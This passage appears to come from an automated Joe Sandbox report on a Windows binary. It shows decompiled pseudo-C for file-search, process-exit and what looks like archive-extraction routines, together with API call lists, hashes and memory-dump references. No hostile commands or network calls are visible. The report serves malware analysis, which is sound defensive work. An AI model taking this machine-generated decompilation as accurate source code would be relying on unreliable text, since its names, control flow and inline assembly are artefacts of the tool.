						L13:
						E0100FE56(_t83, _a4696, 0x800);
						_push(0x800);
						E0100BCFB(__eflags, _t83,  &_a32);
						_t49 = 0 + _a8;
						__eflags = _t49;
						 *(_t83 + 0x1000) = _t49;
						asm("adc ecx, 0x0");
						 *((intOrPtr*)(_t83 + 0x1008)) = _v24;
						 *((intOrPtr*)(_t83 + 0x1028)) = _v20;
						 *((intOrPtr*)(_t83 + 0x102c)) = _v16;
						 *((intOrPtr*)(_t83 + 0x1030)) = _v12;
						 *((intOrPtr*)(_t83 + 0x1034)) = _v8;
						 *((intOrPtr*)(_t83 + 0x1038)) = _v4;
						 *(_t83 + 0x103c) = _v0.dwFileAttributes;
						 *((intOrPtr*)(_t83 + 0x1004)) = _a4;
						E01010E19(_t83 + 0x1010, _t81,  &_v4);
						E01010E19(_t83 + 0x1018, _t81,  &_v24);
						E01010E19(_t83 + 0x1020, _t81,  &_v20);
					} else {
						if(E0100B66C(_a4696,  &_a592, 0x800) == 0) {
							L4:
							_t68 = GetLastError();
							if(_t68 == 2 || _t68 == 3 || _t68 == 0x12) {
								_t69 = 0;
								__eflags = 0;
							} else {
								_t69 = 1;
							}
							 *((char*)(_t83 + 0x1044)) = _t69;
						} else {
							_t73 = FindFirstFileW( &_a592,  &_v0); // executed
							_t86 = _t73;
							if(_t86 != _t75) {
								goto L13;
							} else {
								goto L4;
							}
						}
					}
				}
				 *(_t83 + 0x1040) =  *(_t83 + 0x1040) & 0x00000000;
				return _t86;
			}

0x0100a5f4
0x0100a5f9
0x0100a5fe
0x0100a601
0x0100a60d
0x0100a614
0x0100a61c
0x0100a61f
0x0100a692
0x0100a698
0x0100a69a
0x0100a69c
0x0100a69e
0x0100a6a4
0x0100a6a7
0x0100a6a7
0x0100a6aa
0x0100a6aa
0x0100a6b0
0x0100a6b2
0x00000000
0x00000000
0x0100a621
0x0100a628
0x0100a62e
0x0100a632
0x0100a6b8
0x0100a6c1
0x0100a6c6
0x0100a6cd
0x0100a6d8
0x0100a6d8
0x0100a6dc
0x0100a6e6
0x0100a6e9
0x0100a6f3
0x0100a6fd
0x0100a707
0x0100a711
0x0100a71b
0x0100a725
0x0100a72f
0x0100a73c
0x0100a74c
0x0100a75c
0x0100a638
0x0100a64f
0x0100a66a
0x0100a66a
0x0100a673
0x0100a684
0x0100a684
0x0100a67f
0x0100a681
0x0100a681
0x0100a686
0x0100a651
0x0100a65e
0x0100a664
0x0100a668
0x00000000
0x00000000
0x00000000
0x00000000
0x0100a668
0x0100a64f
0x0100a632
0x0100a761
0x0100a774

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0100A4EF,000000FF,?,?), ref: 0100A628
FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0100A4EF,000000FF,?,?), ref: 0100A65E
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0100A4EF,000000FF,?,?), ref: 0100A66A
FindNextFileW.KERNEL32(?,?,?,?,?,?,0100A4EF,000000FF,?,?), ref: 0100A692
GetLastError.KERNEL32(?,?,?,?,0100A4EF,000000FF,?,?), ref: 0100A69E

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next
String ID:
API String ID: 869497890-0
Opcode ID: 423cbfdd3e910e72f9789889c54ea736d35eb0799ac46e8770ccd5a006fa0e88
Instruction ID: 6acdb063c52c945300f613646760e76da9955d891c42ac220c46ebf87076df10
Opcode Fuzzy Hash: 423cbfdd3e910e72f9789889c54ea736d35eb0799ac46e8770ccd5a006fa0e88
Instruction Fuzzy Hash: 98415176604746AFD325EF68C8C4ADAF7F8BB88340F004A29F5D9D3240D739A9948B91

Uniqueness

Uniqueness Score: -1.00%

Function 0102753D, Relevance: 4.5, APIs: 3, Instructions: 20
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0102753D(int _a4) {
				void* _t14;
				void* _t16;

				if(E0102A836(_t14, _t16) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E010275C2(_t14, _t16, _a4);
				ExitProcess(_a4);
			}

0x01027549
0x01027565
0x01027565
0x0102756e
0x01027577

APIs

GetCurrentProcess.KERNEL32(00000000,?,01027513,00000000,0103BAD8,0000000C,0102766A,00000000,00000002,00000000), ref: 0102755E
TerminateProcess.KERNEL32(00000000,?,01027513,00000000,0103BAD8,0000000C,0102766A,00000000,00000002,00000000), ref: 01027565
ExitProcess.KERNEL32 ref: 01027577

Memory Dump Source

Source File: 00000000.00000002.669760352.0000000001001000.00000020.00020000.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.669757585.0000000001000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669802257.0000000001033000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.669848166.000000000103E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669854966.0000000001044000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669862234.0000000001055000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669867892.000000000105D000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669872953.0000000001061000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.669877946.0000000001062000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_9bdcc933d0c04da1fa41ba915c460d9fa573e4bc5814b.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: ee35b49997a01ee941dd8afe748ff68b2f5c388bf5c208d730f478721ef86f81
Instruction ID: 44ad123bfa85a493a29edb8354b9e33586dfa3ab8b821f7357018b83ceb1e218
Opcode Fuzzy Hash: ee35b49997a01ee941dd8afe748ff68b2f5c388bf5c208d730f478721ef86f81
Instruction Fuzzy Hash: 70E0E631100964EFCF21AF58D958A49BF6DFF50641F504454F9854F126CB7ADD42CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0100857B, Relevance: 3.9, APIs: 2, Instructions: 947
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E0100857B(intOrPtr __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t371;
				signed int _t375;
				signed int _t376;
				signed int _t381;
				signed int _t387;
				void* _t389;
				signed int _t390;
				signed int _t394;
				signed int _t395;
				signed int _t400;
				signed int _t405;
				signed int _t406;
				signed int _t410;
				signed int _t420;
				signed int _t421;
				signed int _t424;
				signed int _t425;
				signed int _t434;
				char _t436;
				char _t438;
				signed int _t439;
				signed int _t440;
				signed int _t463;
				signed int _t472;
				intOrPtr _t475;
				char _t482;
				signed int _t483;
				void* _t494;
				void* _t502;
				void* _t504;
				signed int _t514;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				signed int _t523;
				signed int _t526;
				signed int _t534;
				signed int _t544;
				signed int _t546;
				signed int _t548;
				signed int _t550;
				signed char _t551;
				signed int _t554;
				void* _t559;
				signed int _t567;
				intOrPtr* _t578;
				intOrPtr _t580;
				signed int _t581;
				signed int _t591;
				intOrPtr _t594;
				signed int _t597;
				signed int _t606;
				signed int _t613;
				signed int _t615;
				signed int _t616;
				signed int _t619;
				signed int _t637;
				signed int _t638;
				void* _t645;
				void* _t646;
				signed int _t662;
				signed int _t673;
				intOrPtr _t674;
				void* _t676;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed int _t680;
				signed int _t681;
				signed int _t687;
				intOrPtr _t689;
				signed int _t694;
				intOrPtr _t696;
				signed int _t699;
				signed int _t704;
				void* _t708;
				void* _t710;
				void* _t712;

				_t580 = __ecx;
				E0101E28C(E01031E4A, _t708);
				E0101E360();
				_t578 =  *((intOrPtr*)(_t708 + 8));
				_t672 = 0;
				_t689 = _t580;
				 *((intOrPtr*)(_t708 - 0x20)) = _t689;
				_t371 =  *( *(_t689 + 8) + 0x82fa) & 0x0000ffff;
				 *(_t708 - 0x18) = _t371;
				if( *((intOrPtr*)(_t708 + 0xc)) != 0) {
					L6:
					_t696 =  *((intOrPtr*)(_t578 + 0x21dc));
					__eflags = _t696 - 2;
					if(_t696 == 2) {
						 *(_t689 + 0x10f7) = _t672;
						__eflags =  *(_t578 + 0x32dc) - _t672;
						if(__eflags > 0) {
							L22:
							__eflags =  *(_t578 + 0x32e4) - _t672;
							if(__eflags > 0) {
								L26:
								_t581 =  *(_t689 + 8);
								__eflags =  *((intOrPtr*)(_t581 + 0x6160)) - _t672;
								if( *((intOrPtr*)(_t581 + 0x6160)) != _t672) {
									L29:
									 *(_t708 - 0x13) = _t672;
									_t35 = _t708 - 0x51ac; // -18860
									_t36 = _t708 - 0x13; // 0x7ed
									_t375 = E01005E3A(_t578 + 0x2280, _t36, 6, _t672, _t35, 0x800);
									__eflags = _t375;
									_t376 = _t375 & 0xffffff00 | _t375 != 0x00000000;
									 *(_t708 - 0x12) = _t376;
									__eflags = _t376;
									if(_t376 != 0) {
										__eflags =  *(_t708 - 0x13);
										if( *(_t708 - 0x13) == 0) {
											__eflags = 0;
											 *((char*)(_t689 + 0xf1)) = 0;
										}
									}
									E01002071(_t578);
									_push(0x800);
									_t43 = _t708 - 0x113c; // -2364
									_push(_t578 + 0x22a8);
									E0100B2E3();
									__eflags =  *((char*)(_t578 + 0x3373));
									 *(_t708 - 0x1c) = 1;
									if( *((char*)(_t578 + 0x3373)) == 0) {
										_t381 = E0100215B(_t578);
										__eflags = _t381;
										if(_t381 == 0) {
											_t551 =  *(_t689 + 8);
											__eflags = 1 -  *((intOrPtr*)(_t551 + 0x72c4));
											asm("sbb al, al");
											_t61 = _t708 - 0x12;
											 *_t61 =  *(_t708 - 0x12) &  !_t551;
											__eflags =  *_t61;
										}
									} else {
										_t554 =  *( *(_t689 + 8) + 0x72c4);
										__eflags = _t554 - 1;
										if(_t554 != 1) {
											__eflags =  *(_t708 - 0x13);
											if( *(_t708 - 0x13) == 0) {
												__eflags = _t554;
												 *(_t708 - 0x12) =  *(_t708 - 0x12) & (_t554 & 0xffffff00 | _t554 == 0x00000000) - 0x00000001;
												_push(0);
												_t54 = _t708 - 0x113c; // -2364
												_t559 = E0100BC34(_t54);
												_t662 =  *(_t689 + 8);
												__eflags =  *((intOrPtr*)(_t662 + 0x72c4)) - 1 - _t559;
												if( *((intOrPtr*)(_t662 + 0x72c4)) - 1 != _t559) {
													 *(_t708 - 0x12) = 0;
												} else {
													_t57 = _t708 - 0x113c; // -2364
													_push(1);
													E0100BC34(_t57);
												}
											}
										}
									}
									 *((char*)(_t689 + 0x5f)) =  *((intOrPtr*)(_t578 + 0x3319));
									 *((char*)(_t689 + 0x60)) = 0;
									asm("sbb eax, [ebx+0x32dc]");
									 *0x1033260( *((intOrPtr*)(_t578 + 0x6ca8)) -  *(_t578 + 0x32d8),  *((intOrPtr*)(_t578 + 0x6cac)), 0);
									 *((intOrPtr*)( *_t578 + 0x10))();
									_t673 = 0;
									_t387 = 0;
									 *(_t708 - 0xe) = 0;
									 *(_t708 - 0x24) = 0;
									__eflags =  *(_t708 - 0x12);
									if( *(_t708 - 0x12) != 0) {
										L43:
										_t699 =  *(_t708 - 0x18);
										_t591 =  *((intOrPtr*)( *(_t689 + 8) + 0x6201));
										_t389 = 0x49;
										__eflags = _t591;
										if(_t591 == 0) {
											L45:
											_t390 = _t673;
											L46:
											__eflags = _t591;
											_t83 = _t708 - 0x113c; // -2364
											_t394 = L01011375(_t591, _t83, (_t390 & 0xffffff00 | _t591 == 0x00000000) & 0x000000ff, _t390,  *(_t708 - 0x24)); // executed
											__eflags = _t394;
											if(__eflags == 0) {
												L219:
												_t395 = 0;
												L16:
												L17:
												 *[fs:0x0] =  *((intOrPtr*)(_t708 - 0xc));
												return _t395;
											}
											_push(0x800);
											 *((intOrPtr*)(_t708 - 0x38)) = _t689 + 0x10f8;
											_t86 = _t708 - 0x113c; // -2364
											E0100826A(__eflags, _t578, _t86, _t689 + 0x10f8);
											__eflags =  *(_t708 - 0xe);
											if( *(_t708 - 0xe) != 0) {
												L50:
												 *(_t708 - 0xd) = 0;
												L51:
												_t400 =  *(_t689 + 8);
												_t594 = 0x45;
												__eflags =  *((char*)(_t400 + 0x6157));
												_t674 = 0x58;
												 *((intOrPtr*)(_t708 - 0x34)) = _t594;
												 *((intOrPtr*)(_t708 - 0x30)) = _t674;
												if( *((char*)(_t400 + 0x6157)) != 0) {
													L53:
													__eflags = _t699 - _t594;
													if(_t699 == _t594) {
														L55:
														_t97 = _t708 - 0x31ac; // -10668
														E010070BF(_t97);
														_push(0);
														_t98 = _t708 - 0x31ac; // -10668
														_t405 = E0100A4C6(_t97, _t674, __eflags, _t689 + 0x10f8, _t98);
														__eflags = _t405;
														if(_t405 == 0) {
															_t406 =  *(_t689 + 8);
															__eflags =  *((char*)(_t406 + 0x6157));
															_t109 = _t708 - 0xd;
															 *_t109 =  *(_t708 - 0xd) & (_t406 & 0xffffff00 |  *((char*)(_t406 + 0x6157)) != 0x00000000) - 0x00000001;
															__eflags =  *_t109;
															L61:
															_t111 = _t708 - 0x113c; // -2364
															_t410 = E01007D6C(_t111, _t578, _t111);
															__eflags = _t410;
															if(_t410 != 0) {
																while(1) {
																	__eflags =  *((char*)(_t578 + 0x331b));
																	if( *((char*)(_t578 + 0x331b)) == 0) {
																		goto L65;
																	}
																	_t116 = _t708 - 0x113c; // -2364
																	_t544 = E01008236(_t689, _t578);
																	__eflags = _t544;
																	if(_t544 == 0) {
																		 *((char*)(_t689 + 0x20f8)) = 1;
																		goto L219;
																	}
																	L65:
																	_t118 = _t708 - 0x13c; // 0x6c4
																	_t702 =  *(_t689 + 8) + 0x5024;
																	_t597 = 0x40;
																	memcpy(_t118,  *(_t689 + 8) + 0x5024, _t597 << 2);
																	_t712 = _t710 + 0xc;
																	asm("movsw");
																	_t121 = _t708 - 0x28; // 0x7d8
																	_t689 =  *((intOrPtr*)(_t708 - 0x20));
																	 *(_t708 - 4) = 0;
																	asm("sbb ecx, ecx");
																	_t128 = _t708 - 0x13c; // 0x6c4
																	E0100C991(_t689 + 0x10, 0,  *((intOrPtr*)(_t578 + 0x331c)), _t128,  ~( *(_t578 + 0x3320) & 0x000000ff) & _t578 + 0x00003321, _t578 + 0x3331,  *((intOrPtr*)(_t578 + 0x336c)), _t578 + 0x334b, _t121);
																	__eflags =  *((char*)(_t578 + 0x331b));
																	if( *((char*)(_t578 + 0x331b)) == 0) {
																		L73:
																		 *(_t708 - 4) =  *(_t708 - 4) | 0xffffffff;
																		_t147 = _t708 - 0x13c; // 0x6c4
																		L0100EAB4(_t147);
																		_t148 = _t708 - 0x2164; // -6500
																		E01009619(_t148);
																		_t420 =  *(_t578 + 0x3380);
																		 *(_t708 - 4) = 1;
																		 *(_t708 - 0x2c) = _t420;
																		_t676 = 0x50;
																		__eflags = _t420;
																		if(_t420 == 0) {
																			L83:
																			_t421 = E0100215B(_t578);
																			__eflags = _t421;
																			if(_t421 == 0) {
																				_t606 =  *(_t708 - 0xd);
																				__eflags = _t606;
																				if(_t606 == 0) {
																					_t702 =  *(_t708 - 0x18);
																					L96:
																					__eflags =  *((char*)(_t578 + 0x6cb4));
																					if( *((char*)(_t578 + 0x6cb4)) == 0) {
																						__eflags = _t606;
																						if(_t606 == 0) {
																							L212:
																							 *(_t708 - 4) =  *(_t708 - 4) | 0xffffffff;
																							_t359 = _t708 - 0x2164; // -6500
																							E01009653(_t359, _t702);
																							__eflags =  *(_t708 - 0x12);
																							_t387 =  *(_t708 - 0xd);
																							_t677 =  *(_t708 - 0xe);
																							if( *(_t708 - 0x12) != 0) {
																								_t363 = _t689 + 0xec;
																								 *_t363 =  *(_t689 + 0xec) + 1;
																								__eflags =  *_t363;
																							}
																							L214:
																							__eflags =  *((char*)(_t689 + 0x60));
																							if( *((char*)(_t689 + 0x60)) != 0) {
																								goto L219;
																							}
																							__eflags = _t387;
																							if(_t387 != 0) {
																								L15:
																								_t395 = 1;
																								goto L16;
																							}
																							__eflags =  *((intOrPtr*)(_t578 + 0x6cb4)) - _t387;
																							if( *((intOrPtr*)(_t578 + 0x6cb4)) != _t387) {
																								__eflags = _t677;
																								if(_t677 != 0) {
																									goto L15;
																								}
																								goto L219;
																							}
																							L217:
																							E01001EDA(_t578);
																							goto L15;
																						}
																						L101:
																						_t424 =  *(_t689 + 8);
																						__eflags =  *((char*)(_t424 + 0x6201));
																						if( *((char*)(_t424 + 0x6201)) == 0) {
																							L103:
																							_t425 =  *(_t708 - 0xe);
																							__eflags = _t425;
																							if(_t425 != 0) {
																								L108:
																								 *((char*)(_t708 - 0x11)) = 1;
																								__eflags = _t425;
																								if(_t425 != 0) {
																									L110:
																									 *((intOrPtr*)(_t689 + 0xe8)) =  *((intOrPtr*)(_t689 + 0xe8)) + 1;
																									 *((intOrPtr*)(_t689 + 0x80)) = 0;
																									 *((intOrPtr*)(_t689 + 0x84)) = 0;
																									 *((intOrPtr*)(_t689 + 0x88)) = 0;
																									 *((intOrPtr*)(_t689 + 0x8c)) = 0;
																									E0100AA88(_t689 + 0xc8, _t676,  *((intOrPtr*)(_t578 + 0x32f0)),  *((intOrPtr*)( *(_t689 + 8) + 0x82e0))); // executed
																									E0100AA88(_t689 + 0xa0, _t676,  *((intOrPtr*)(_t578 + 0x32f0)),  *((intOrPtr*)( *(_t689 + 8) + 0x82e0)));
																									_t702 = _t689 + 0x10;
																									 *(_t689 + 0x30) =  *(_t578 + 0x32d8);
																									_t218 = _t708 - 0x2164; // -6500
																									 *(_t689 + 0x34) =  *(_t578 + 0x32dc);
																									E0100C9D9(_t702, _t578, _t218);
																									_t678 =  *((intOrPtr*)(_t708 - 0x11));
																									_t613 = 0;
																									_t434 =  *(_t708 - 0xe);
																									 *((char*)(_t689 + 0x39)) = _t678;
																									 *((char*)(_t689 + 0x3a)) = _t434;
																									 *(_t708 - 0x24) = 0;
																									 *(_t708 - 0x1c) = 0;
																									__eflags = _t678;
																									if(_t678 != 0) {
																										L127:
																										_t679 =  *(_t689 + 8);
																										__eflags =  *((char*)(_t679 + 0x61a0));
																										 *((char*)(_t708 - 0x214b)) =  *((char*)(_t679 + 0x61a0)) == 0;
																										__eflags =  *((char*)(_t708 - 0x11));
																										if( *((char*)(_t708 - 0x11)) != 0) {
																											L131:
																											_t436 = 1;
																											__eflags = 1;
																											L132:
																											__eflags =  *(_t708 - 0x2c);
																											 *((char*)(_t708 - 0x10)) = _t613;
																											 *((char*)(_t708 - 0x14)) = _t436;
																											 *((char*)(_t708 - 0xf)) = _t436;
																											if( *(_t708 - 0x2c) == 0) {
																												__eflags =  *(_t578 + 0x3318);
																												if( *(_t578 + 0x3318) == 0) {
																													__eflags =  *((char*)(_t578 + 0x22a0));
																													if(__eflags != 0) {
																														E01012C42(_t578,  *((intOrPtr*)(_t689 + 0xe0)), _t708,  *((intOrPtr*)(_t578 + 0x3374)),  *(_t578 + 0x3370) & 0x000000ff);
																														_t475 =  *((intOrPtr*)(_t689 + 0xe0));
																														 *(_t475 + 0x4c48) =  *(_t578 + 0x32e0);
																														__eflags = 0;
																														 *(_t475 + 0x4c4c) =  *(_t578 + 0x32e4);
																														 *((char*)(_t475 + 0x4c60)) = 0;
																														E010128F1( *((intOrPtr*)(_t689 + 0xe0)),  *((intOrPtr*)(_t578 + 0x229c)),  *(_t578 + 0x3370) & 0x000000ff);
																													} else {
																														_push( *(_t578 + 0x32e4));
																														_push( *(_t578 + 0x32e0));
																														_push(_t702); // executed
																														E010092E6(_t578, _t679, _t689, __eflags); // executed
																													}
																												}
																												L163:
																												E01001EDA(_t578);
																												__eflags =  *((char*)(_t578 + 0x3319));
																												if( *((char*)(_t578 + 0x3319)) != 0) {
																													L166:
																													_t438 = 0;
																													__eflags = 0;
																													_t615 = 0;
																													L167:
																													__eflags =  *(_t578 + 0x3370);
																													if( *(_t578 + 0x3370) != 0) {
																														__eflags =  *((char*)(_t578 + 0x22a0));
																														if( *((char*)(_t578 + 0x22a0)) == 0) {
																															L175:
																															__eflags =  *(_t708 - 0xe);
																															 *((char*)(_t708 - 0x10)) = _t438;
																															if( *(_t708 - 0xe) != 0) {
																																L185:
																																__eflags =  *(_t708 - 0x2c);
																																_t680 =  *((intOrPtr*)(_t708 - 0xf));
																																if( *(_t708 - 0x2c) == 0) {
																																	L189:
																																	_t616 = 0;
																																	__eflags = 0;
																																	L190:
																																	__eflags =  *((char*)(_t708 - 0x11));
																																	if( *((char*)(_t708 - 0x11)) != 0) {
																																		goto L212;
																																	}
																																	_t702 =  *(_t708 - 0x18);
																																	__eflags = _t702 -  *((intOrPtr*)(_t708 - 0x30));
																																	if(_t702 ==  *((intOrPtr*)(_t708 - 0x30))) {
																																		L193:
																																		__eflags =  *(_t708 - 0x2c);
																																		if( *(_t708 - 0x2c) == 0) {
																																			L197:
																																			__eflags = _t438;
																																			if(_t438 == 0) {
																																				L200:
																																				__eflags = _t616;
																																				if(_t616 != 0) {
																																					L208:
																																					_t439 =  *(_t689 + 8);
																																					__eflags =  *((char*)(_t439 + 0x61a8));
																																					if( *((char*)(_t439 + 0x61a8)) == 0) {
																																						_t702 = _t689 + 0x10f8;
																																						_t440 = E0100A444(_t689 + 0x10f8,  *((intOrPtr*)(_t578 + 0x22a4))); // executed
																																						__eflags = _t440;
																																						if(__eflags == 0) {
																																							E0101F190(E01001F94(__eflags, 0x11, _t578 + 0x24, _t702));
																																						}
																																					}
																																					 *(_t689 + 0x10f7) = 1;
																																					goto L212;
																																				}
																																				_t681 =  *(_t708 - 0x1c);
																																				__eflags = _t681;
																																				_t619 =  *(_t708 - 0x24);
																																				if(_t681 > 0) {
																																					L203:
																																					__eflags = _t438;
																																					if(_t438 != 0) {
																																						L206:
																																						_t332 = _t708 - 0x2164; // -6500
																																						E01009EBF(_t332);
																																						L207:
																																						_t702 = _t578 + 0x32d0;
																																						_t694 = _t578 + 0x32c0;
																																						asm("sbb eax, eax");
																																						asm("sbb ecx, ecx");
																																						asm("sbb eax, eax");
																																						_t340 = _t708 - 0x2164; // -6500
																																						E01009D62(_t340, _t578 + 0x32d0,  ~( *( *(_t689 + 8) + 0x72d0)) & _t694,  ~( *( *(_t689 + 8) + 0x72d4)) & _t578 + 0x000032c8,  ~( *( *(_t689 + 8) + 0x72d8)) & _t578 + 0x000032d0);
																																						_t341 = _t708 - 0x2164; // -6500
																																						E010096D0(_t341);
																																						E01007BD1( *((intOrPtr*)(_t708 - 0x20)),  *((intOrPtr*)( *((intOrPtr*)(_t708 - 0x20)) + 8)), _t578,  *((intOrPtr*)(_t708 - 0x38)));
																																						asm("sbb eax, eax");
																																						asm("sbb eax, eax");
																																						__eflags =  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t708 - 0x20)) + 8)) + 0x72d0)) & _t694;
																																						E01009D5F( ~( *( *((intOrPtr*)( *((intOrPtr*)(_t708 - 0x20)) + 8)) + 0x72d0)) & _t694,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t708 - 0x20)) + 8)) + 0x72d0)) & _t694,  ~( *( *((intOrPtr*)( *((intOrPtr*)(_t708 - 0x20)) + 8)) + 0x72d8)) & _t578 + 0x000032d0);
																																						_t689 =  *((intOrPtr*)(_t708 - 0x20));
																																						goto L208;
																																					}
																																					__eflags =  *((intOrPtr*)(_t689 + 0x88)) - _t619;
																																					if( *((intOrPtr*)(_t689 + 0x88)) != _t619) {
																																						goto L206;
																																					}
																																					__eflags =  *((intOrPtr*)(_t689 + 0x8c)) - _t681;
																																					if( *((intOrPtr*)(_t689 + 0x8c)) == _t681) {
																																						goto L207;
																																					}
																																					goto L206;
																																				}
																																				__eflags = _t619;
																																				if(_t619 == 0) {
																																					goto L207;
																																				}
																																				goto L203;
																																			}
																																			_t463 =  *(_t689 + 8);
																																			__eflags =  *((char*)(_t463 + 0x61a0));
																																			if( *((char*)(_t463 + 0x61a0)) == 0) {
																																				goto L212;
																																			}
																																			_t438 =  *((intOrPtr*)(_t708 - 0x10));
																																			goto L200;
																																		}
																																		__eflags = _t616;
																																		if(_t616 != 0) {
																																			goto L197;
																																		}
																																		__eflags =  *(_t578 + 0x3380) - 5;
																																		if( *(_t578 + 0x3380) != 5) {
																																			goto L212;
																																		}
																																		__eflags = _t680;
																																		if(_t680 == 0) {
																																			goto L212;
																																		}
																																		goto L197;
																																	}
																																	__eflags = _t702 -  *((intOrPtr*)(_t708 - 0x34));
																																	if(_t702 !=  *((intOrPtr*)(_t708 - 0x34))) {
																																		goto L212;
																																	}
																																	goto L193;
																																}
																																__eflags =  *(_t578 + 0x3380) - 4;
																																if( *(_t578 + 0x3380) != 4) {
																																	goto L189;
																																}
																																__eflags = _t680;
																																if(_t680 == 0) {
																																	goto L189;
																																}
																																_t616 = 1;
																																goto L190;
																															}
																															__eflags =  *((char*)(_t708 - 0x14));
																															if( *((char*)(_t708 - 0x14)) == 0) {
																																goto L185;
																															}
																															__eflags = _t615;
																															if(_t615 != 0) {
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t578 + 0x331b)) - _t615;
																															if(__eflags == 0) {
																																L183:
																																_t312 = _t708 - 0x113c; // -2364
																																_push(_t578 + 0x24);
																																_push(3);
																																L184:
																																E01001F94(__eflags);
																																 *((char*)(_t708 - 0x10)) = 1;
																																E01006FC6(0x1040f50, 3);
																																_t438 =  *((intOrPtr*)(_t708 - 0x10));
																																goto L185;
																															}
																															__eflags =  *((intOrPtr*)(_t578 + 0x3341)) - _t615;
																															if( *((intOrPtr*)(_t578 + 0x3341)) == _t615) {
																																L181:
																																__eflags =  *((char*)(_t689 + 0xf4));
																																if(__eflags != 0) {
																																	goto L183;
																																}
																																_t310 = _t708 - 0x113c; // -2364
																																_push(_t578 + 0x24);
																																_push(4);
																																goto L184;
																															}
																															__eflags =  *(_t578 + 0x6cc4) - _t615;
																															if(__eflags == 0) {
																																goto L183;
																															}
																															goto L181;
																														}
																														__eflags =  *(_t578 + 0x32e4) - _t438;
																														if(__eflags < 0) {
																															goto L175;
																														}
																														if(__eflags > 0) {
																															L173:
																															__eflags = _t615;
																															if(_t615 != 0) {
																																 *((char*)(_t689 + 0xf4)) = 1;
																															}
																															goto L175;
																														}
																														__eflags =  *(_t578 + 0x32e0) - _t438;
																														if( *(_t578 + 0x32e0) <= _t438) {
																															goto L175;
																														}
																														goto L173;
																													}
																													 *((char*)(_t689 + 0xf4)) = _t438;
																													goto L175;
																												}
																												asm("sbb edx, edx");
																												_t472 = E0100AA56(_t689 + 0xc8, _t689, _t578 + 0x32f0,  ~( *(_t578 + 0x334a) & 0x000000ff) & _t578 + 0x0000334b);
																												__eflags = _t472;
																												if(_t472 == 0) {
																													goto L166;
																												}
																												_t615 = 1;
																												_t438 = 0;
																												goto L167;
																											}
																											_t702 =  *(_t578 + 0x3380);
																											__eflags = _t702 - 4;
																											if(__eflags == 0) {
																												L146:
																												_push(0x800);
																												_t263 = _t708 - 0x41ac; // -14764
																												E0100826A(__eflags, _t578, _t578 + 0x3384, _t263);
																												_t613 =  *((intOrPtr*)(_t708 - 0x10));
																												__eflags = _t613;
																												if(_t613 == 0) {
																													L153:
																													_t482 =  *((intOrPtr*)(_t708 - 0xf));
																													L154:
																													__eflags =  *((intOrPtr*)(_t578 + 0x6cb0)) - 2;
																													if( *((intOrPtr*)(_t578 + 0x6cb0)) != 2) {
																														L141:
																														__eflags = _t613;
																														if(_t613 == 0) {
																															L157:
																															_t483 = 0;
																															__eflags = 0;
																															L158:
																															 *(_t689 + 0x10f7) = _t483;
																															goto L163;
																														}
																														L142:
																														__eflags = _t482;
																														if(_t482 == 0) {
																															goto L157;
																														}
																														_t483 = 1;
																														goto L158;
																													}
																													__eflags = _t613;
																													if(_t613 != 0) {
																														goto L142;
																													}
																													L140:
																													 *((char*)(_t708 - 0x14)) = 0;
																													goto L141;
																												}
																												__eflags =  *((short*)(_t708 - 0x41ac));
																												if( *((short*)(_t708 - 0x41ac)) == 0) {
																													goto L153;
																												}
																												_t267 = _t708 - 0x41ac; // -14764
																												_push(0x800);
																												_push(_t689 + 0x10f8);
																												__eflags = _t702 - 4;
																												if(__eflags != 0) {
																													_push(_t578 + 0x24);
																													_t270 = _t708 - 0x2164; // -6500
																													_t482 = E01009224(_t679, _t689, _t702, __eflags);
																												} else {
																													_t482 = E01007698(_t613, __eflags);
																												}
																												L151:
																												 *((char*)(_t708 - 0xf)) = _t482;
																												__eflags = _t482;
																												if(_t482 == 0) {
																													L139:
																													_t613 =  *((intOrPtr*)(_t708 - 0x10));
																													goto L140;
																												}
																												_t613 =  *((intOrPtr*)(_t708 - 0x10));
																												goto L154;
																											}
																											__eflags = _t702 - 5;
																											if(__eflags == 0) {
																												goto L146;
																											}
																											__eflags = _t702 - _t436;
																											if(_t702 == _t436) {
																												L144:
																												__eflags = _t613;
																												if(_t613 == 0) {
																													goto L153;
																												}
																												_push(_t689 + 0x10f8);
